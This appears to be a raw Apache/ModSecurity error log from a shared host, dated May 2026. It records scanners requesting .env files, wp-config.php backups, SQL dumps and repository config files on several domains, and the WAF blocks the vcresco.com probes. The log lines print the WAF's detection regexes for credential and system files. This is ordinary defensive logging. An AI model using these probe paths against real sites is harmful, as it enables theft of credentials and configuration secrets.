[Tue May 26 13:04:29.427648 2026] [security2:error] [pid 485064:tid 485285] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH_EgAAAOA"]
[Tue May 26 13:04:29.435152 2026] [security2:error] [pid 485064:tid 485263] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH_FwAAAMo"]
[Tue May 26 13:04:29.620488 2026] [security2:error] [pid 485064:tid 485219] [client 195.178.110.199:45538] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH_JAAAAJ4"]
[Tue May 26 13:04:29.636537 2026] [security2:error] [pid 485064:tid 485216] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH--wAAAJs"]
[Tue May 26 13:04:29.814163 2026] [security2:error] [pid 485064:tid 485307] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH_MQAAAPY"]
[Tue May 26 13:04:29.982004 2026] [security2:error] [pid 485064:tid 485233] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH-7QAArFM"], referer: http://kingsclub.in/composer.json
[Tue May 26 13:04:29.990736 2026] [security2:error] [pid 485064:tid 485221] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH-8gAAoEU"], referer: http://kingsclub.in/.gitconfig
[Tue May 26 13:04:29.999350 2026] [security2:error] [pid 485064:tid 485305] [client 195.178.110.199:45538] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH_OwAAAPQ"]
[Tue May 26 13:04:30.041955 2026] [security2:error] [pid 485064:tid 485278] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH-_wAA2WI"], referer: http://kingsclub.in/application.yml
[Tue May 26 13:04:30.083540 2026] [security2:error] [pid 485064:tid 485130] [remote 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH_BgAA6kE"], referer: http://kingsclub.in/docker-compose.yml
[Tue May 26 13:04:30.200098 2026] [security2:error] [pid 485064:tid 485320] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBj9tlF55stOmSqH_RAAAAQM"]
[Tue May 26 13:04:30.492997 2026] [security2:error] [pid 485064:tid 485149] [remote 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH-6wAAxFQ"], referer: http://kingsclub.in/config.js
[Tue May 26 13:04:30.500060 2026] [security2:error] [pid 485064:tid 485223] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBj9tlF55stOmSqH_UgAAAKI"]
[Tue May 26 13:04:30.536201 2026] [security2:error] [pid 485064:tid 485236] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBj9tlF55stOmSqH_WwAAAK8"]
[Tue May 26 13:04:30.822350 2026] [security2:error] [pid 485064:tid 485284] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBj9tlF55stOmSqH_ZQAAAN8"]
[Tue May 26 13:04:30.842845 2026] [security2:error] [pid 485064:tid 485259] [client 195.178.110.199:45688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/v1/.env"] [unique_id "ahVNBj9tlF55stOmSqH_ZgAAAMY"]
[Tue May 26 13:04:31.032340 2026] [security2:error] [pid 485064:tid 485260] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_bQAAAMc"]
[Tue May 26 13:04:31.041288 2026] [security2:error] [pid 485064:tid 485289] [client 195.178.110.199:45664] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/var/www/html/.env"] [unique_id "ahVNBz9tlF55stOmSqH_cQAAAOQ"]
[Tue May 26 13:04:31.057418 2026] [security2:error] [pid 485064:tid 485254] [client 195.178.110.199:42348] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/web/.env"] [unique_id "ahVNBz9tlF55stOmSqH_cwAAAME"]
[Tue May 26 13:04:31.079262 2026] [security2:error] [pid 485064:tid 485318] [client 195.178.110.199:42442] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_cgAAAQE"]
[Tue May 26 13:04:31.099035 2026] [security2:error] [pid 485064:tid 485201] [client 195.178.110.199:45780] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_dQAAAIw"]
[Tue May 26 13:04:31.210456 2026] [security2:error] [pid 485064:tid 485252] [client 195.178.110.199:45688] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_fQAAAL8"]
[Tue May 26 13:04:31.220081 2026] [security2:error] [pid 485064:tid 485264] [client 195.178.110.199:45664] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_fgAAAMs"]
[Tue May 26 13:04:31.295537 2026] [security2:error] [pid 485064:tid 485276] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_hAAAANc"]
[Tue May 26 13:04:31.311569 2026] [security2:error] [pid 485064:tid 485222] [client 195.178.110.199:45780] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_hQAAAKE"]
[Tue May 26 13:04:31.397780 2026] [security2:error] [pid 485064:tid 485263] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_jgAAAMo"]
[Tue May 26 13:04:31.406504 2026] [security2:error] [pid 485064:tid 485216] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_kwAAAJs"]
[Tue May 26 13:04:31.565654 2026] [security2:error] [pid 485064:tid 485246] [client 195.178.110.199:42442] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/var/www/.env"] [unique_id "ahVNBz9tlF55stOmSqH_mwAAALk"]
[Tue May 26 13:04:31.592658 2026] [security2:error] [pid 485064:tid 485284] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_oAAAAN8"]
[Tue May 26 13:04:31.706675 2026] [security2:error] [pid 485064:tid 485307] [client 195.178.110.199:45780] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_pQAAAPY"]
[Tue May 26 13:04:31.731339 2026] [security2:error] [pid 485064:tid 485203] [client 195.178.110.199:42348] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_pwAAAI4"]
[Tue May 26 13:04:31.732902 2026] [security2:error] [pid 485064:tid 485245] [client 195.178.110.199:45650] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_qAAAALg"]
[Tue May 26 13:04:31.751216 2026] [security2:error] [pid 485064:tid 485277] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_iAAAANg"]
[Tue May 26 13:04:31.786372 2026] [security2:error] [pid 485064:tid 485256] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_rwAAAMM"]
[Tue May 26 13:04:31.852135 2026] [security2:error] [pid 485064:tid 485201] [client 195.178.110.199:45780] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "vcresco.com"] [uri "/wp-config.php.new"] [unique_id "ahVNBz9tlF55stOmSqH_swAAAIw"]
[Tue May 26 13:04:31.876020 2026] [security2:error] [pid 485064:tid 485278] [client 195.178.110.199:42348] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "vcresco.com"] [uri "/wp-config.php.old"] [unique_id "ahVNBz9tlF55stOmSqH_tAAAANk"]
[Tue May 26 13:04:31.935829 2026] [security2:error] [pid 485064:tid 485288] [client 195.178.110.199:45614] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVNBz9tlF55stOmSqH_tQAAAOM"]
[Tue May 26 13:04:31.975323 2026] [security2:error] [pid 485064:tid 485293] [client 195.178.110.199:45538] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_twAAAOg"]
[Tue May 26 13:04:32.023313 2026] [security2:error] [pid 485064:tid 485241] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_vQAAALQ"]
[Tue May 26 13:04:32.034720 2026] [security2:error] [pid 485064:tid 485295] [client 195.178.110.199:45750] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNCD9tlF55stOmSqH_vgAAAOo"]
[Tue May 26 13:04:32.117717 2026] [security2:error] [pid 485064:tid 485296] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNCD9tlF55stOmSqH_xAAAAOs"]
[Tue May 26 13:04:32.134005 2026] [security2:error] [pid 485064:tid 485274] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNCD9tlF55stOmSqH_xwAAANU"]
[Tue May 26 13:04:32.177438 2026] [security2:error] [pid 485064:tid 485319] [client 195.178.110.199:42422] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNCD9tlF55stOmSqH_ygAAAQI"]
[Tue May 26 13:04:32.180048 2026] [security2:error] [pid 485064:tid 485306] [client 195.178.110.199:45688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-config.php"] [unique_id "ahVNCD9tlF55stOmSqH_zAAAAPU"]
[Tue May 26 13:04:32.252789 2026] [security2:error] [pid 485064:tid 485317] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNCD9tlF55stOmSqH_0wAAAQA"]
[Tue May 26 13:04:32.315326 2026] [security2:error] [pid 485064:tid 485196] [client 195.178.110.199:42384] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "vcresco.com"] [uri "/wp-config.php.bak"] [unique_id "ahVNCD9tlF55stOmSqH_2gAAAIc"]
[Tue May 26 13:04:32.416578 2026] [security2:error] [pid 485064:tid 485210] [client 195.178.110.199:45650] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNCD9tlF55stOmSqH_4AAAAJU"]
[Tue May 26 13:04:32.504996 2026] [security2:error] [pid 485064:tid 485230] [client 195.178.110.199:45614] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNCD9tlF55stOmSqH_4wAAAKk"]
[Tue May 26 13:04:32.943552 2026] [security2:error] [pid 485064:tid 485311] [client 195.178.110.199:42442] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/website/.env"] [unique_id "ahVNCD9tlF55stOmSqH_-QAAAPo"]
[Tue May 26 13:04:33.715801 2026] [security2:error] [pid 485064:tid 485301] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNCT9tlF55stOmSqEADAAAAPA"]
[Tue May 26 13:04:35.839235 2026] [security2:error] [pid 485064:tid 485316] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNCz9tlF55stOmSqEAfgAAAP8"]
[Tue May 26 13:04:36.107465 2026] [security2:error] [pid 485064:tid 485275] [client 157.20.138.61:64741] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNDD9tlF55stOmSqEAnwAAANY"]
[Tue May 26 13:04:36.107580 2026] [security2:error] [pid 485064:tid 485275] [client 157.20.138.61:64741] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNDD9tlF55stOmSqEAnwAAANY"]
[Tue May 26 13:04:36.786520 2026] [ssl:error] [pid 485064:tid 485262] [client 98.84.1.175:8750] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname cpanel.acacia.org.in provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 13:04:38.413085 2026] [security2:error] [pid 485064:tid 485218] [client 223.109.255.206:60803] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVNDj9tlF55stOmSqEBEwAAAJ0"], referer: http://pic.sogou.com
[Tue May 26 13:04:39.011892 2026] [security2:error] [pid 485064:tid 485257] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNDj9tlF55stOmSqEBIQAAAMQ"]
[Tue May 26 13:04:40.909721 2026] [security2:error] [pid 485064:tid 485254] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNED9tlF55stOmSqEBgAAAAME"]
[Tue May 26 13:04:41.042604 2026] [security2:error] [pid 485064:tid 485241] [client 43.250.164.247:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVNET9tlF55stOmSqEBtQAAALQ"], referer: https://www.ucdc.co.in/
[Tue May 26 13:04:41.053061 2026] [autoindex:error] [pid 485064:tid 485245] [client 43.250.164.247:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 13:04:43.013111 2026] [security2:error] [pid 485064:tid 485305] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNEj9tlF55stOmSqEB_wAAAPQ"]
[Tue May 26 13:04:43.590253 2026] [security2:error] [pid 485064:tid 485300] [client 144.217.135.217:43939] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVNEj9tlF55stOmSqEB9gAAAO8"]
[Tue May 26 13:04:43.766654 2026] [security2:error] [pid 485064:tid 485233] [client 144.217.135.217:43939] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVNEz9tlF55stOmSqECQgAAAKw"]
[Tue May 26 13:04:44.911568 2026] [security2:error] [pid 485064:tid 485259] [client 144.217.135.217:43939] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVNFD9tlF55stOmSqECcgAAAMY"]
[Tue May 26 13:04:45.277867 2026] [security2:error] [pid 485064:tid 485203] [client 144.217.135.217:52327] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVNFT9tlF55stOmSqEChQAAAI4"], referer: http://www.plenitudotonal.com/ads.txt
[Tue May 26 13:04:45.510751 2026] [security2:error] [pid 485064:tid 485319] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNFT9tlF55stOmSqEChgAAAQI"]
[Tue May 26 13:04:45.627836 2026] [security2:error] [pid 485064:tid 485277] [client 144.217.135.217:43939] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVNFT9tlF55stOmSqECkwAAANg"]
[Tue May 26 13:04:45.977180 2026] [security2:error] [pid 485064:tid 485211] [client 144.217.135.217:39331] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVNFT9tlF55stOmSqECqAAAAJY"], referer: http://www.plenitudotonal.com/security.txt
